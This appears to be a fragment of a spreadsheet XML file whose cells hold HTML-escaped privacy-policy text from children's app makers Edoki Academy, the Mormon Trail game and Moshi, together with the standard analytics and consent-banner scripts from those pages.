  </si>
  <si>
    <t>COPPA Safe Harbor Certification&lt;/h3&gt;&lt;p&gt;Edoki Academy is a member of the PRIVO Kids Privacy Assured COPPA Safe Harbor Certification Program (“the Program”). The Program certification applies to the digital properties listed on the validation page that is viewable by clicking on the PRIVO Seal. PRIVO is an independent, third-party organization committed to safeguarding children's personal information collected online.</t>
  </si>
  <si>
    <t>The PRIVO COPPA certification Seal posted on this page indicates Edoki Academy has established COPPA compliant privacy practices and has agreed to submit to PRIVO’s oversight and consumer dispute resolution process. If you have questions or concerns about our privacy practices, please contact us at +33(0)661573792 or privacy@edokiacademy.com. If you have further concerns after you have contacted us, you can contact PRIVO directly at privacy@privo.com.&lt;/p&gt;&lt;a href="http://privo.com/privo-site-validation/?company=401" target="_blank"&gt;&lt;img src="https://privohub.privo.com/files/images/certSeal2018/COPPA.png" style="margin-bottom: 2em;"&gt;&lt;/a&gt;&lt;p&gt;This document explains the principles of and our commitments to the protection of your Personal Data.</t>
  </si>
  <si>
    <t>It aims to inform you about:&lt;/p&gt;&lt;ul&gt;&lt;li&gt; The Personal Data that EDOKI ACADEMY collects and the reasons for this collection,&lt;/li&gt;&lt;li&gt;How your Personal Data is used, and&lt;/li&gt;&lt;li&gt;Your rights as a person concerned by our data processing practices.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This Policy applies to all EDOKI ACADEMY services regardless of their nature (website, applications, services...)&lt;/p&gt;&lt;h3&gt; The Data Controller&lt;/h3&gt;&lt;p&gt;EDOKI ACADEMY is responsible for processing your Personal Data.</t>
  </si>
  <si>
    <t>Its contact details are:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Address: 18 rue Barbès 92120 Montrouge (France).&lt;/li&gt;&lt;li&gt;Telephone  +33 (0)6 61 57 37 92&lt;/li&gt;&lt;li&gt;Email: privacy@edokiacademy.com&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt; How EDOKI ACADEMY protects Personal Data&lt;/h3&gt;&lt;p&gt;EDOKI ACADEMY takes the protection of your Personal Data and your privacy into account when designing its services (Privacy by design). To ensure the security of this data and respect of your rights, EDOKI ACADEMY implements measures to protect your Personal Data (Privacy by default).&lt;/p&gt;&lt;h3&gt;What Personal Data does EDOKI ACADEMY use?&lt;/h3&gt;&lt;p&gt;EDOKI ACADEMY only collects the data necessary to operate our services.&lt;/p&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>In the case where optional data is requested, EDOKI ACADEMY will clearly inform you about the Personal Data required to perform the service.&lt;/p&gt;&lt;p&gt;Personal Data is used to provide you with other services, only if you have agreed to receive commercial communications.&lt;/p&gt;&lt;p&gt;We encourage parents to use the parent dashboard in the apps and that children play with parental supervision.&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;p&gt;We collect the following personal information:&lt;/p&gt;&lt;ul&gt;&lt;li&gt; For each parental account: an email address, and a password. All parent accounts are transferable across our apps i.e.you can use the same login credentials in all the apps and on the website.</t>
  </si>
  <si>
    <t>In Edoki Sight Words Adventure, parents can record a word for the child to learn. These recordings and your child’s drawings are saved to our servers so that they may be accessed wherever you log in.&lt;/li&gt;&lt;li&gt; For each teacher account: an email address, first and last name, phone number, district name, school name, school country, city and post code/zip code.</t>
  </si>
  <si>
    <t>For each child (optionally): a first name, a nickname, or any string of characters that the user chooses to identify the child with. We also collect the following non-personal information: the devices used to play, your country and language chosen the first time the app was opened.&lt;/li&gt;&lt;li&gt;We also collect the following non-personal information:
 For each use of an application: the information related to the use.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Like most websites, we also automatically collect information about your computer such as the IP address, browser type, operating system and pages visited.</t>
  </si>
  <si>
    <t>&lt;/p&gt;&lt;p&gt;We use this information to:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Improve the mechanics of our games and adapt the interface to the user’s needs, &lt;/li&gt;&lt;li&gt; Track the user’s progress,&lt;/li&gt;&lt;li&gt;Conduct research and analysis on our own behalf,&lt;/li&gt;&lt;li&gt;Answer questions and concerns, and &lt;/li&gt;&lt;li&gt; View content based on your use of the service (for example, progress).&lt;/li&gt;&lt;li&gt;To send you information and offers on our services, via our partners.&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Social networks&lt;/h4&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>We allow parents to create a profile and share information such as messages, photos and videos with others. We cannot control the actions of others with whom you decide to share your pages and information. We also cannot guarantee that the content you post from our site will not be seen by anyone outside your network.&lt;/p&gt;&lt;h3&gt;What is the basis for the legitimacy of our treatment of your Personal Data?&lt;/h3&gt;&lt;p&gt;EDOKI ACADEMY relies on the following legitimate bases to process personal data:&lt;/p&gt;&lt;h4&gt;Execution of contract&lt;/h4&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>The legal basis for the processing and collection of the user’s Personal Data is the execution of the contract of sale. In this respect, the user is obliged to provide the data necessary for the sale’s execution. If they do not provide this data to the online payment provider, it will not be possible to make the sale.&lt;/p&gt;&lt;h4&gt;Consent&lt;/h4&gt;&lt;p&gt;The legal basis for processing the user's Personal Data is their consent.</t>
  </si>
  <si>
    <t>In the event that they have given it, EDOKI ACADEMY reserves the right to use it for the following purposes:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Managing the subscription on the website and to the applications.&lt;/li&gt;&lt;li&gt;Managing the sending of information about exclusive promotions, the latest news and personalized information tailored to the user’s profile.&lt;/li&gt;&lt;li&gt;Answer to the user’s request to exercise their rights to access, modify, cancel or oppose, as well as address any questions or claims.&lt;/li&gt;&lt;li&gt;Managing the availability alert service for new applications.&lt;/li&gt;&lt;li&gt;Managing and issuing of documents certifying the sale, such as a digital ticket.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The withdrawal of consent to these treatments by the user will not condition the execution of the contract of sale concluded by the person concerned with EDOKI ACADEMY.&lt;/p&gt;&lt;h3&gt;Personal data of minors&lt;/h3&gt;&lt;p&gt;Our services are intended to be used by minors only with the consent and under the control of their parents or legal representatives.&lt;/p&gt;&lt;h3&gt;Who can your Personal Data be sent to?&lt;/h3&gt;&lt;p&gt;Your data may be transmitted:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;To our internal departments which are in charge of the execution of the subscribed services, in particular Customer Service and Sales Administration.&lt;/li&gt;&lt;li&gt;To external providers who provide us with services for the operation of our services, mainly technical service providers, including subcontractors.&lt;/li&gt;&lt;li&gt;if Edoki Academy is involved in a merger, acquisition, or sale of all or a portion of its assets, you will be notified via email and/or a prominent notice on our Web site of any change in ownership or uses of your personal information, as well as any choices you may have regarding your personal information&lt;/li&gt;&lt;li&gt;Our partners to send you information and announcements related to our services.&lt;/li&gt;&lt;/ul&gt;&lt;h3&gt;Can your Personal Data be transferred outside the European Union?&lt;/h3&gt;&lt;p&gt;Edoki Academy stores your data on servers located in the United States that are managed by MongoDB Atlas. MongoDB Atlas participates in the EU-US Data Protection Shield in accordance with the decision made by the European Commission on  July 12, 2016 concerning the collection, use, and retention of personal data from EU Member States, and also signed contractual clauses approved by the European Commission for the transfer of personal data outside the EU.&lt;/p&gt;&lt;p&gt;However, for certain specific services, EDOKI ACADEMY may use subcontractors established outside the EU.</t>
  </si>
  <si>
    <t>Certain Personal Data can then be communicated to them for the strict needs of their missions. In accordance with the regulations reinforced by the EU, EDOKI ACADEMY requires its subcontractors to provide the guarantees necessary to supervise and secure these transfers, in particular by signing the European Commission’s standard contractual clauses.&lt;/p&gt;&lt;h3&gt;How long does EDOKI ACADEMY keep your Personal Data?&lt;/h3&gt;&lt;p&gt;How long we keep your Personal Data depends on the service you have subscribed to. EDOKI ACADEMY does  not keep your Personal Data beyond the time necessary to provide our services.</t>
  </si>
  <si>
    <t>It does, therefore, use your Personal data while you use the service and during the retention period imposed by the applicable rules on legal provision.&lt;/p&gt;&lt;p&gt;We will retain your personal information as long as your account is active. If you wish to cancel your account, or ask us to stop using your information to provide you with our services, please contact us at privacy@edokiacademy.com.&lt;/p&gt;&lt;h3&gt;Is your Personal Data protected?&lt;/h3&gt;&lt;p&gt;EDOKI ACADEMY takes all measures necessary to ensure the security and confidentiality of your Personal Data and, in particular, to prevent it from being damaged, erased or shared with unauthorized third parties.&lt;/p&gt;&lt;p&gt;The security of your personal information is important to us, so we encrypt the transmission of such information using Secure Socket Layer (SSL) technology.&lt;/p&gt;&lt;p&gt; We follow generally accepted industry standards to protect the personal information that has been provided to us.</t>
  </si>
  <si>
    <t>However no method of transmission or electronic storage is 100% reliable. We cannot guarantee absolute security.&lt;/p&gt;&lt;p&gt;If you have questions about security on our website, contact us: privacy@edokiacademy.com&lt;/p&gt;&lt;p&gt; Moreover, in the event of a Personal Data Violation affecting your Personal Data (destruction, loss, alteration or disclosure), EDOKI ACADEMY will respect our obligation to notify you of such violations, in accordance with the CNIL (registration number 1627782).&lt;/p&gt;&lt;h3&gt;What are your rights with regard to your Personal Data?&lt;/h3&gt;&lt;p&gt;You have the right to exercise the rights provided by the regulations applicable to Personal Data at any time, provided that you meet certain conditions:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Right of access: you can a copy of your Personal Data subject to treatment by EDOKI ACADEMY.</t>
  </si>
  <si>
    <t>To do so, login to  the website &lt;a href="https://montessori.edokiacademy.com/en/login/"&gt;montessori.edokiacademy.com/en/login/&lt;/a&gt; with your email and password&gt; &lt;a href="https://www.edokiacademy.com/en/account/"&gt;montessori.edokiacademy.com/en/account/&lt;/a&gt; "Personal Data" section&lt;/li&gt;&lt;li&gt;You can &amp;quot;download&amp;quot; your Personal Data&lt;/li&gt;&lt;li&gt;You can &amp;quot;delete&amp;quot; your Personal Data&lt;/li&gt;&lt;li&gt;Right of rectification: you can update your Personal Data or have your Personal Data processed by EDOKI ACADEMY;&lt;/li&gt;&lt;li&gt; Right of opposition, in particular to receive commercial communications: you can express your wish to no longer receive commercial communications from EDOKI ACADEMY or request that your Personal Data no longer be subject to processing;&lt;/li&gt;&lt;li&gt;Right to erasure: you can request the deletion of your Personal Data;&lt;/li&gt;&lt;li&gt; Right to limitation: you can request the suspension of the processing of your Personal Data;&lt;/li&gt;&lt;li&gt;</t>
  </si>
  <si>
    <t>Right to portability: you can ask EDOKI ACADEMY to recover your Personal Data in order to dispose of it.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;When subscribing to a service or providing your Personal Data, you are given the address (postal and / or electronic) to which to send your request to exercise your rights.&lt;/p&gt;&lt;p&gt;All requests must be accompanied by a proof of identity. EDOKI ACADEMY will respond to your request to  exercise your rights as soon as possible and, if applicable, in compliance with legal deadlines.&lt;/p&gt;&lt;p&gt;To request the deletion of your Personal Data from our blog or forum, contact us at: privacy@edokiacademy.com. In some circumstances, we may not be able to delete your personal information.</t>
  </si>
  <si>
    <t>We will let you know if this is the case.&lt;/p&gt;&lt;h3&gt;Changes to the Privacy Policy and Protection of Personal Data&lt;/h3&gt;&lt;p&gt;We may update this privacy statement to reflect changes in our information handling practices. If we make any material changes, we will notify you by email (at the email address provided in your account) or by notice on this site, before the change becomes effective. We encourage you to check this page regularly for the latest information on our privacy policies.&lt;/p&gt;&lt;h3 id="cookies"&gt;POLICY ON COOKIES&lt;/h3&gt;&lt;p&gt;</t>
  </si>
  <si>
    <t>The EDOKI ACADEMY website and all its web pages use cookies to distinguish you from other users of the site. This allows us to improve services and optimize your user experience.&lt;/p&gt;&lt;p&gt;A cookie is a string of text information transferred from a website to your computer's hard drive so that the website can remember you. Cookies can help a website adapt content more quickly to your interests.</t>
  </si>
  <si>
    <t>Most importantly websites use cookies. In general, a cookie contains the name of the domain of origin of the cookie; the &amp;quot;lifetime&amp;quot; of the cookie and a value, namely a unique number created randomly.&lt;/p&gt;&lt;p&gt;There are two  types of cookies on the EDOKI ACADEMY website:&lt;/p&gt;&lt;ul&gt;&lt;li&gt; Temporary cookies, which remain in your browser's cookie file until you leave the site, and&lt;/li&gt;&lt;li&gt;Persistent cookies, which stay in your browser’s cookie file for much longer (the duration depends on the lifetime of the cookie in question).&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Temporary cookies are used:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;To allow you to transfer information from one page of our site to another without having to enter it again, and&lt;/li&gt;&lt;li&gt;To allow you to access saved registration information.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Persistent cookies are used:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;To help us identify you as a visitor (using a number, not personally) when you return to our website;&lt;/li&gt;&lt;li&gt;To allow us to tailor content or ads to your interests, or to avoid showing you the same ads multiple times; and&lt;/li&gt;&lt;li&gt;To compile anonymous global statistics that allow us to understand how visitors use our site and to help us improve the structure of our website.</t>
  </si>
  <si>
    <t>We cannot personally identify you this way.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; You have the option to accept or decline cookies by changing your browser settings. However, you may lose some interactive features of the service, if cookies are disabled.&lt;/p&gt;&lt;p&gt;You will find a list of the main cookies we use and their functions below.&lt;/p&gt;&lt;table&gt;&lt;tr&gt;&lt;th&gt;Cookie’s name&lt;/th&gt;&lt;th&gt;Type of cookie&lt;/th&gt;&lt;th&gt;Cookie’s function&lt;/th&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;connect.sid&lt;/td&gt;&lt;td&gt;Temporary&lt;/td&gt;&lt;td&gt;When you log in to the website, this cookie temporarily stores a token to keep you connected when you navigate from page to page.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;cookieconsent_dismissed&lt;/td&gt;&lt;td&gt;Persistent&lt;/td&gt;&lt;td&gt;This cookie stores your answer regarding the cookie notice that was presented to you.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;_ga&lt;/td&gt;&lt;td&gt;Persistent&lt;/td&gt;&lt;td&gt;</t>
  </si>
  <si>
    <t>We use Google Analytics to compile anonymous aggregate statistics that help us understand</t>
  </si>
  <si>
    <t>&lt;html&gt;
    &lt;head&gt;
        &lt;meta property="version" content="2022-12-17"/&gt;
        &lt;meta property="published" content="2023-01-05"/&gt;
        &lt;meta property="template" content="adsense"/&gt;
        &lt;meta charset="utf-8"/&gt;
        &lt;meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport"/&gt;
        &lt;meta content="" property="og:url"/&gt;
        &lt;meta content="website" property="og:type"/&gt;
        &lt;meta content="Mormon Trial Privacy Policy" property="og:title"/&gt;
        &lt;title&gt;Mormon Trial Privacy Policy&lt;/title&gt;
            &lt;script async
                    src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-7841493567155718"
                    crossorigin="anonymous"&gt;&lt;/script&gt;
        &lt;style&gt;
            * {
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
    font-family: Arial, sans-serif;
}
body {
  padding: 0;
  margin: 0;
  -webkit-text-size-adjust: 100%;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  text-rendering: optimizeLegibility;
  -webkit-font-feature-settings: "pnum";
  font-feature-settings: "pnum";
  font-variant-numeric: proportional-nums;
  position: relative;
  background: #fff;
}
.container {
    padding-right: 0;
    padding-left: 0;
    margin-right: auto;
    margin-left: auto;
}
@media (min-width: 768px) {
    .container {
        width: 738px;
        padding-right: 15px;
        padding-left: 15px;
        margin-right: auto;
        margin-left: auto;
    }
}
@media (min-width: 992px) {
    .container {
        width: 962px;
    }
}
@media (min-width: 1200px) {
    .container {
        width: 1170px;
    }
}
.main-container {
    color: #222;
    text-align: left ! important;
    padding: 2em;
    background: #fff;
    min-height: 400px;
    -webkit-box-shadow: 0 0 3px 0 rgba(0, 0, 0, .25);
    -moz-box-shadow: 0 0</t>
  </si>
  <si>
    <t>3px 0 rgba(0, 0, 0, .25);
    box-shadow: 0 0 3px 0 rgba(0, 0, 0, .25)
}
.main-container * {
    text-align: left ! important
}
.main-container :not(a) {
    color: #222
}
.main-container ins.adsbygoogle {
    background: #ccc
}
.main-container #content p {
    margin-top: 1rem;
    margin-bottom: 1rem
}
a {
    color: #009c9c
}
a:hover {
    color: #007bff
}
h2 {
    font-size: 1.5em
}
@media only screen and (max-width: 600px) {
    h2 {
        font-size: 1.2em
    }
}
a.nohover {
    color: #fff;
    text-decoration: none
}
footer {
  background: #222;
    padding: 20px 15px;
    font-size: 0.9em;
}
footer p {
  color: #666 !important;
}
footer a {
    color: #888;
    text-decoration: none;
}
        &lt;/style&gt;
    &lt;/head&gt;
    &lt;body style="background:#222;"&gt;
        &lt;div style="background:#eee;"&gt;
            &lt;div class="container"&gt;
                    &lt;div&gt;
    &lt;ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-7841493567155718"
         data-ad-slot="4671721417" data-ad-format="auto" data-full-width-responsive="true"&gt;&lt;/ins&gt;
    &lt;script type="text/javascript"&gt;
        (adsbygoogle = window.adsbygoogle ||</t>
  </si>
  <si>
    <t xml:space="preserve">[]).push({});
    &lt;/script&gt;
&lt;/div&gt;
                &lt;div class="main-container"&gt;
                    &lt;h2 style="margin-top:0;"&gt;Mormon Trial Privacy Policy&lt;/h2&gt;
                    &lt;hr style="margin-bottom: 1em;"&gt;
                    &lt;div id="content"&gt;
                        &lt;p&gt;                   Guinea Pig Games LLC built the Mormon Trail app as                   a Commercial app. This SERVICE is provided by                   Guinea Pig Games LLC  and is intended for use as                   is.                  &lt;/p&gt; &lt;p&gt;                   </t>
  </si>
  <si>
    <t>This page is used to inform visitors regarding our                   policies with the collection, use, and disclosure of Personal                   Information if anyone decided to use our Service.                  &lt;/p&gt; &lt;p&gt;                   If you choose to use our Service, then you agree to                   the collection and use of information in relation to this                   policy. The Personal Information that we collect is                   used for providing and improving the Service.</t>
  </si>
  <si>
    <t xml:space="preserve">We will not use or share your information with                   anyone except as described in this Privacy Policy.                  &lt;/p&gt; &lt;p&gt;                    The terms used in this Privacy Policy have the same meanings                   as in our Terms and Conditions, which is accessible at                   Mormon Trail unless otherwise defined in this Privacy Policy.                 </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Information Collection and Use&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                    For a better experience, while using our Service, we                   may require you to provide us with certain personally                   identifiable information. The information that                   we request will be retained by us and used as described in this privacy policy.                 </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;div&gt;&lt;p&gt;                     The app does use third party services that may collect                     information used to identify you.                    &lt;/p&gt; &lt;p&gt;                     Link to privacy policy of third party service providers used                     by the app                   &lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;a rel="nofollow" target="_blank" href="https://www.google.com/policies/privacy/"&gt;Google Play Services&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt; &lt;p&gt;&lt;strong&gt;Log Data&lt;/strong&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;                   We want to inform you that whenever you                   use our Service, in a case of an error in the app                   we collect data and information (through third party                   products) on your phone called Log Data. This Log Data may                   include information such as your device Internet Protocol                   (“IP”) address, device name, operating system version, the                   configuration of the app when utilizing our Service,                   the time and date of your use of the Service, and other                   statistics.                  &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                   Cookies are files with a small amount of data that are                   commonly used as anonymous unique identifiers.</t>
  </si>
  <si>
    <t>These are sent                   to your browser from the websites that you visit and are                   stored on your device's internal memory.                  &lt;/p&gt; &lt;p&gt;                    This Service does not use these “cookies” explicitly.</t>
  </si>
  <si>
    <t xml:space="preserve">However,                   the app may use third party code and libraries that use                   “cookies” to collect information and improve their services.                    You have the option to either accept or refuse these cookies                   and know when a cookie is being sent to your device. If you                   choose to refuse our cookies, you may not be able to use some                   portions of this Service.                 </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Service Providers&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                   We may employ third-party companies and                   individuals due to the following reasons:                 &lt;/p&gt; &lt;ul&gt;&lt;li&gt;To facilitate our Service;&lt;/li&gt; &lt;li&gt;To provide the Service on our behalf;&lt;/li&gt; &lt;li&gt;To perform Service-related services; or&lt;/li&gt; &lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;                    We want to inform users of this Service                   that these third parties have access to your Personal                   Information.</t>
  </si>
  <si>
    <t xml:space="preserve">The reason is to perform the tasks assigned to                   them on our behalf. However, they are obligated not to                   disclose or use the information for any other purpose.                  &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                   </t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Links to Other Sites&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                   </t>
  </si>
  <si>
    <t xml:space="preserve">This Service may contain links to other sites. If you click on                   a third-party link, you will be directed to that site. Note                   that these external sites are not operated by us.                   </t>
  </si>
  <si>
    <t xml:space="preserve">Therefore, we strongly advise you to review the                   Privacy Policy of these websites. We have                   no control over and assume no responsibility for the content,                   privacy policies, or practices of any third-party sites or                   services.                  &lt;/p&gt; &lt;p&gt;&lt;strong&gt;Children’s Privacy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                   These Services do not address anyone under the age of 13.                   </t>
  </si>
  <si>
    <t xml:space="preserve">We do not knowingly collect personally                   identifiable information from children under 13 years of age. In the case                   we discover that a child under 13 has provided                   us with personal information, we immediately                   delete this from our servers. If you are a parent or guardian                   and you are aware that your child has provided us with                   personal information, please contact us so that                   we will be able to do necessary actions.                 </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Changes to This Privacy Policy&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                   We may update our Privacy Policy from                   time to time. Thus, you are advised to review this page                   periodically for any changes.</t>
  </si>
  <si>
    <t xml:space="preserve">We will                   notify you of any changes by posting the new Privacy Policy on                   this page.                  &lt;/p&gt; &lt;p&gt; This policy is effective as of 2021-11-03&lt;/p&gt; &lt;p&gt;&lt;strong&gt;Contact Us&lt;/strong&gt;&lt;/p&gt; &lt;p&gt;                   If you have any questions or suggestions about our                   Privacy Policy, do not hesitate to contact us at guineapiggamesllc@gmail.com.                 </t>
  </si>
  <si>
    <t>&lt;/p&gt; &lt;p&gt; This privacy policy page was created at &lt;a rel="nofollow" target="_blank" href="https://privacypolicytemplate.net"&gt;privacypolicytemplate.net &lt;/a&gt;and modified/generated by &lt;a rel="nofollow" target="_blank" href="https://app-privacy-policy-generator.nisrulz.com/"&gt;App Privacy Policy Generator&lt;/a&gt;&lt;/p&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
                &lt;div class="main-container" style="margin-top:20px;"&gt;
                    &lt;ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-7841493567155718"
     data-ad-slot="3760930508"&gt;&lt;/ins&gt;
&lt;script&gt;
    (adsbygoogle = window.adsbygoogle || []).push({});
&lt;/script&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
        &lt;footer&gt;
    &lt;div class="container"&gt;
        &lt;div class="row"&gt;
            &lt;div class="col-xs-12 col-md-6" style="text-align:left;margin:auto;vertical-align:middle;"&gt;
                &lt;div id="attribution"&gt;
                    &lt;p&gt;
                        Document hosted by
                        &lt;a href="https://www.flycricket.com"&gt;Flycricket&lt;/a&gt;
                        &amp;bull;
                        &lt;a href="https://flycricket.com/privacy.html"&gt;Privacy Policy&lt;/a&gt;
                        &amp;bull;
                        &lt;a href="https://flycricket.com/cookie_policy.html"&gt;Cookie Policy&lt;/a&gt;
                        &amp;bull;
                        &lt;a href="https://flycricket.com/terms.html"&gt;Terms of Use&lt;/a&gt;&lt;/p&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/footer&gt;
        &lt;script async src="https://www.googletagmanager.com/gtag/js"&gt;&lt;/script&gt;
&lt;script&gt;
    window.dataLayer</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE HTML&gt;
&lt;html class="js" lang="en"&gt;
&lt;head&gt;
	&lt;link rel="pingback" href="https://www.moshikids.com/xmlrpc.php" /&gt;
	&lt;link rel="icon" type="image/x-icon" href="https://www.moshikids.com/wp-content/themes/moshi/img/favicon.ico"&gt;
	&lt;meta charset="UTF-8" /&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=0" /&gt;
	&lt;meta name="keywords" content="Moshi"&gt;
	&lt;meta name="copyright" content="Moshi"&gt;
	&lt;meta name="publisher" content="Moshi"&gt;
	&lt;meta name="robots" content="all" /&gt;
	&lt;meta name="apple-itunes-app" content="app-id=1306719339" /&gt;
	&lt;link rel="preconnect" href="https://fonts.googleapis.com"&gt;
	&lt;link rel="preconnect" href="https://fonts.gstatic.com" crossorigin&gt;
	&lt;link href="https://fonts.googleapis.com/ css2?family=Lato:ital,wght@0,400;0,700;1,400&amp;display=swap"
		rel="stylesheet"&gt;
	&lt;script data-cookieconsent="ignore"&gt;
	window.dataLayer = window.dataLayer || [];
	function gtag() {
		dataLayer.push(arguments);
	}
	gtag("consent", "default", {
		ad_storage: "denied",
		analytics_storage: "denied",
		functionality_storage: "denied",
		personalization_storage: "denied",
		security_storage: "granted",
		wait_for_update: 500,
	});
	gtag("set", "ads_data_redaction", true);
	gtag("set", "url_passthrough", true);
&lt;/script&gt;
&lt;script&gt;
		(function (w, d, s, l, i) {
		w[l] = w[l] ||</t>
  </si>
  <si>
    <t>[]; w[l].push({'gtm.start':new Date().getTime(), event: 'gtm.js'});
		var f = d.getElementsByTagName(s)[0],  j = d.createElement(s), dl = l ! == 'dataLayer' ? '&amp;l=' + l : '';
		j.async = true; j.src = 'https://www.googletagmanager.com/gtm.js?id=' +</t>
  </si>
  <si>
    <t>i + dl;
		f.parentNode.insertBefore(j, f);})(
		window,
		document,
		'script',
		'dataLayer',
		'GTM-KSHBC65'
	);
&lt;/script&gt;
&lt;script type="text/javascript"
		id="Cookiebot"
		src="https://consent.cookiebot.com/uc.js"
		data-cbid="adc91269-7415-463b-8c94-6e72f72f4035"
				data-georegions="{'region':'US-06, US','cbid':'5b99bf77-5835-4bc3-98c3-7caa34c80332'}"
							data-layer-name="dataLayer"
							defer	&gt;&lt;/script&gt;
&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;!-- Google Tag Manager for WordPress by gtm4wp.com --&gt;
&lt;script data-cfasync="false" data-pagespeed-no-defer&gt;
	var gtm4wp_datalayer_name = "dataLayer";
	var dataLayer = dataLayer || [];
&lt;/script&gt;
&lt;!-- End Google Tag Manager for WordPress by gtm4wp.com --&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>This site is optimized with the Yoast SEO Premium plugin v20.3 (Yoast SEO v20.3) - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - Moshi&lt;/title&gt;
	&lt;link rel="canonical" href="https://www.moshikids.com/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_GB" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy" /&gt;
	&lt;meta property="og:description" content="Updated 12th April 2023 1. Who are you and what is this Privacy Policy about? Mind Candy Ltd is a UK family entertainment company that creates extraordinary brands.</t>
  </si>
  <si>
    <t>We know that you care about how your Personal Information is used and shared and we care about that too. From the 25th May 2018, new European [&amp;hellip;]" /&gt;
	&lt;meta property="og:url" content="https://www.moshikids.com/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Moshi" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/PlayMoshiKids/" /&gt;
	&lt;meta property="article:modified_time" content="2023-04-12T10:55:49+00:00" /&gt;
	&lt;meta property="og:image" content="https://www.moshikids.com/wp-content/uploads/2021/12/home-19.gif" /&gt;
	&lt;meta property="og:image:width" content="800" /&gt;
	&lt;meta property="og:image:height" content="318" /&gt;
	&lt;meta property="og:image:type" content="image/gif" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:image" content="https://www.moshikids.com/wp-content/uploads/2021/12/home-19.gif" /&gt;
	&lt;meta name="twitter:label1" content="Estimated reading time" /&gt;
	&lt;meta name="twitter:data1" content="14 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://www.moshikids.com/privacy-policy/","url":"https://www.moshikids.com/privacy-policy/","name":"Privacy Policy - Moshi","isPartOf":{"@id":"https://www.moshikids.com/#website"},"datePublished":"2021-11-29T14:34:58+00:00","dateModified":"2023-04-12T10:55:49+00:00","breadcrumb":{"@id":"https://www.moshikids.com/privacy-policy/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https://www.moshikids.com/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"https://www.moshikids.com/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.moshikids.com/"},{"@type":"ListItem","position":2,"name":"Privacy&amp;nbsp;Policy"}]},{"@type":"WebSite","@id":"https://www.moshikids.com/#website","url":"https://www.moshikids.com/","name":"Moshi","description":"Emotional wellbeing for the next generation","publisher":{"@id":"https://www.moshikids.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.moshikids.com/?s={search_term_string}"},"query-input":"required 